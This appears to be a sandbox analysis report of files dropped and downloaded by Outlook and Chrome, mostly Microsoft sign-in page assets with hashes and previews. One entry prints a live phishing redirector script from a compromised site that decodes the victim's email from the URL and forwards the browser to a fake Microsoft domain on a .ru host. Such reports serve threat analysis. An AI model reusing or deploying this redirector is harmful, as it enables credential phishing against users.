                                                                                                                        File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2302976
                                                                                                                        Entropy (8bit):3.5086190731343225
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:8zlpc+0P8J6TEzUIv8rqSI7q0rSBL/A316cql1uSmGN4607Cz:EoQAAjSI7qoSRY3ocql1dmgLuCz
                                                                                                                        MD5:8BE41D8E2B57D18B631616AF61C675A7
                                                                                                                        SHA1:B96E6A224B6986894D11CE2DA3997CEEC8AE9799
                                                                                                                        SHA-256:2342F693F785645EEFF81C46970B9DD28C50FEBD96C4D371F3237CA9EAC09194
                                                                                                                        SHA-512:A2ACC7462FEEC87B1BA2A9FAE4AECDC007D222EC46AD37A93649667ECDC5C779B80655CC405064E8A099922BD7004153A2A78BF52B9E888C3051196D53A79F9C
                                                                                                                        Malicious:false
                                                                                                                        Preview:!BDN..w-SM......\...J....O..............c................@...........@...@...................................@...........................................................................$#......D.................................................................................................................................................................................................................................................................................................................................. .......<..>1.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):786432
                                                                                                                        Entropy (8bit):7.547777983027219
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:WCCzvblOi8kHy46r2z0pDbJnbC7i0Wo/4FQhDdmWj1kwTGNUm:9CzMFKAZNbC7iJogChhmWj11TgD
                                                                                                                        MD5:7E5880A099E801A326B0AB05D7A869D1
                                                                                                                        SHA1:6BF49B195EB281080C9D56DB0E0B4E83D1213C96
                                                                                                                        SHA-256:87424E1EA1EE3D83980EBAFEC21DE30B4784F141AE86C6DE55B77A4A719E3B58
                                                                                                                        SHA-512:B504770F21C04D970AC51101608280303D70FB80A423F21F247EDBA29091B0A8EC64E40B85094323B6D46ED73BC57C71D1D6002E8B614B967D66941EE4283B97
                                                                                                                        Malicious:false
                                                                                                                        Preview:....C...........<...=0.r.V....................#.!BDN..w-SM......\...J....O..............c................@...........@...@...................................@...........................................................................$#......D.................................................................................................................................................................................................................................................................................................................................. .......<..>1...=0.r.V....................#.|...................H>..................8....I.......................S..................>...(T.......................T......................hU..........@............V..................n...HW..................n...HW.......................V..........................................................................................................................................................
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3620
                                                                                                                        Entropy (8bit):6.867828878374734
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                        Malicious:false
                                                                                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):1592
                                                                                                                        Entropy (8bit):4.205005284721148
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                        MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                        SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                        SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                        SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3651
                                                                                                                        Entropy (8bit):4.094801914706141
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                        MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                        SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                        SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                        SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                        Malicious:false
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):28
                                                                                                                        Entropy (8bit):4.164497779200461
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:6ATunSkks:uSBs
                                                                                                                        MD5:17C4BD96DCB397D1D62D24921BC4FEBA
                                                                                                                        SHA1:2C0F2AFF858069D582A97867B183EBD5DC8A9FCB
                                                                                                                        SHA-256:3549DBC06BDD994A38C9A29AECD7E8F9577E2150D15F8D6B0533B4D250666514
                                                                                                                        SHA-512:9659C4D5B7EF0C852428D3AE8A8EE816438E268E4537FFA70823C9CB2C240252E6D9E863B2AE95F39397172EEFAAA73541123DC9255C9B37FC9437C655F55A78
                                                                                                                        Malicious:false
                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkkDou35HwbbhIFDU9-u70SBQ1Xevf9?alt=proto
                                                                                                                        Preview:ChIKBw1Pfru9GgAKBw1Xevf9GgA=
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 38358
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):9793
                                                                                                                        Entropy (8bit):7.979240131456035
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:qm5izhmU60DHue9a00nB8V/KG6bS01U4NQJE9IsiMFy5zZdif3wb8kKgN:6mUvHuej36bS02439IkFwZowb8kKgN
                                                                                                                        MD5:AFA9FD75B05F0BD87B358C7C8FDD62F3
                                                                                                                        SHA1:75CD71E570CB40380BDE05EFEA8B712DD648BEE4
                                                                                                                        SHA-256:D85C1B9BF33063F020E7CB39565243A11EDA153A7B7943EB98F90D077B89DC20
                                                                                                                        SHA-512:E8A5A49963BB31E83AFA5E032F959AB15F1073BCC001E2D4F45EFCEEFEB11A9CC78C0828AB5D3EB055B9C4ED3C7EAC813DE634CC0765C29021E1525A639B207A
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_hvJVkkYnJRncZtU7cDywlg2.js
                                                                                                                        Preview:...........}.r#.r...'b$.pxZ.>g#..u..n!.[..`.,.*.X..*J....~.....K6/..u#)M..w...... 3.7$^M..$.T.-.....c0.~.....-....].k..,}{/./..W.G.].......*.K..j...*..D..vf t.N.Y.......:................~....V..._......Q....=.~.......nw...vG...0K.h.~.I .l......i&..Z$...J...q.... ..n.......x4...}..t2:HD..[g.$Q..f..L.".Z..=....J...@D..?....>.~*.2.N....U"=1V....R.{z.*.&K.pW..'"...C5.....,.".w..d.....HN.".F.A..~.C.e.2..Zo..woW...{#..K...nj.....N.{....Mu..}..t.I #?\...K......{.Ly..eA...|~|....K.....=L..d..m$.. Ozk.K;.[..L...0.i>.3.#.N......w/.`....b...*.=..[.Qy...n.....iDJ[S@o..6H=.......*.i.;../@f..^0E\.[q/=...Nx....[.hy.Px..z.t....2..d.o.2..........{..$.o.'x%.*.._..d.j.D.h.;I.(.{...#:!,..|..X.thay7So..S7.5.G.......o<.z.i........VN...|.E.P.%o.x..4qm...........J/.n...0...%.~.n?....E....Y......w.m......N....1Jf.Jaz....\._..4...B.~...J....y.$..i...2._.....@...8N..S.`....P..t..u<.x....).s...o.<..?.Z...^.S..G..W._.\C.N..D...........A...... .....b>.s...P..h+..K/...^L..#N.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):228
                                                                                                                        Entropy (8bit):5.034981919157441
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:x4XSJM71+RKHS5Mr5IRn1KjmmjuuDG1MJVqLyVb:fCp+sHS5MYOxjNDGGDvb
                                                                                                                        MD5:D9A87642E580FF0AF75478B4B45246BC
                                                                                                                        SHA1:6172A2D2F422A619EDB353001711ACF45C33AC64
                                                                                                                        SHA-256:7E71BD8ED39CFFF1EDC68A7756DB9D6ABA5AA08EE0F6F16E316E15A27A5DF551
                                                                                                                        SHA-512:02A6618454F28A9A22EEB040CC17101FA80FDAFB5537149F4F3A1A24826EBA45B7E5FE7D3D1273D7DBBB5A28C69C12C208A3E36EF852550D3C09E63C636A72EF
                                                                                                                        Malicious:false
                                                                                                                        URL:https://galeonconstruction.com/nin/niit/
                                                                                                                        Preview:<script> . .var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#' + decodedString; }); .</script>
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3620
                                                                                                                        Entropy (8bit):6.867828878374734
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                        Malicious:false
                                                                                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):28
                                                                                                                        Entropy (8bit):4.307354922057605
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:8Kiun9ks:8Kiun2s
                                                                                                                        MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                                                                                        SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                                                                                        SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                                                                                        SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                                                                                        Malicious:false
                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlG59KU8ZYdCxIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                        Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (44154)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):139704
                                                                                                                        Entropy (8bit):5.430156290736106
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:RwsaSfvTPRUbx3tg/MBTbs4WWzkFxq4GnYhbDL/lNs0Vgt2STJaelvdtsjbSobBn:ja2ig/MNKqnnYFzIAemj9ngYj+5iyiQ8
                                                                                                                        MD5:6A8C67F4B80D35EC80CF73980DC37BB8
                                                                                                                        SHA1:1C87168880147830BB2B917948F1D6EB0AC0F354
                                                                                                                        SHA-256:15E697417242D779DDEC5439F81B56BDC61974FFDA9A40919BE81428F341296E
                                                                                                                        SHA-512:48DFA08F37BC1CE8D997AF0EE49D7A58188255CA885BDEB162393952CA45832985C721860FA1BFEEE59B060CB9BDC68A499B5839DD542BDE775219A8E7D1F444
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_aoxn9LgNNeyAz3OYDcN7uA2.js
                                                                                                                        Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,r,o=n[0],a=n[1],s=0,u=[];s<o.length;s++)
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):3651
                                                                                                                        Entropy (8bit):4.094801914706141
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                        MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                        SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                        SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                        SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (64612)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):113964
                                                                                                                        Entropy (8bit):5.4920075410972915
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:u3q8rT8gIRPY0+r5qnWisy+NchzCAprCaOg/PFYOOXtd0N54ou:HgDTMnWsntFOg/HKn0bBu
                                                                                                                        MD5:33962DAD601AB3BC499C26910FD3065E
                                                                                                                        SHA1:7A55487B2532F9B04F37747722192E31C3776D2D
                                                                                                                        SHA-256:C2735F54F9EA5B4009FB3F28E9013D3BE1645466FD79D0FD06387C5C39438D0A
                                                                                                                        SHA-512:F4B53A00011243C7723C536CDFD85816C67C2F584DA115A8F344AA414B0F840E5F71566667B52152D3DA0490517E90D11F24F23AA6DA5171771051AD3A7321D9
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_7582d7648944aa49d261.js
                                                                                                                        Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[35],{474:function(e,t,r
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (32020)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):52995
                                                                                                                        Entropy (8bit):5.386001714899789
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:ABqF1tlfretkF7IKbVaqDRx3/ym+d/Px2g+0wtKWivnqTPRUbx3Sg/MY+5:ABrkF7IyJvym+d/Pog+0wtKWi29g/M9
                                                                                                                        MD5:A7084EA2C2BF43E6D9E34C65799DC885
                                                                                                                        SHA1:7D0CFA897C98525DD6DE9852B8BFAEE53BE57604
                                                                                                                        SHA-256:03779F821CF3D1898257B5B8A372790D1535C8A37248FD099A2E2995B15F966D
                                                                                                                        SHA-512:EE081DC05AA9DA6771CF04B765FCBCD7DA9298C6A614E06213AA6F8D56F7F50ECEE04A9877CD8A1C0A9200396A38C171189D176179F2B54A89E98C05C9666C20
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz40xlez3ihq2.js
                                                                                                                        Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):1435
                                                                                                                        Entropy (8bit):7.8613342322590265
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 424047
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):117041
                                                                                                                        Entropy (8bit):7.998008046719208
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:8kMCdGWkMM2W01lnjYC02cJwYG+WIkB/31dV44tniglkEUPeyEuiDRmmH94UWJhe:JJ9J1lnWJZWIkp1E4IgVLHucuzig27gw
                                                                                                                        MD5:988B1D37096135264EA1BAE1EC88DFF3
                                                                                                                        SHA1:6913B41C137E610F162977D51C9AD18FB344385A
                                                                                                                        SHA-256:382CA11A0AE7BBF92AAE646898468A8BA0B420205D07B76C3B218EDB27A598D1
                                                                                                                        SHA-512:C9A6D64F67FE32FC6141B051078FB36B54D342A47B57399F38164039EF607AB5141E27424E718CAF7545E2E76B29D303AECF83DEAD7AC43B3BF316602CB50E44
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_yZQmhMbiqPW1IsJcdAPQ0A2.js
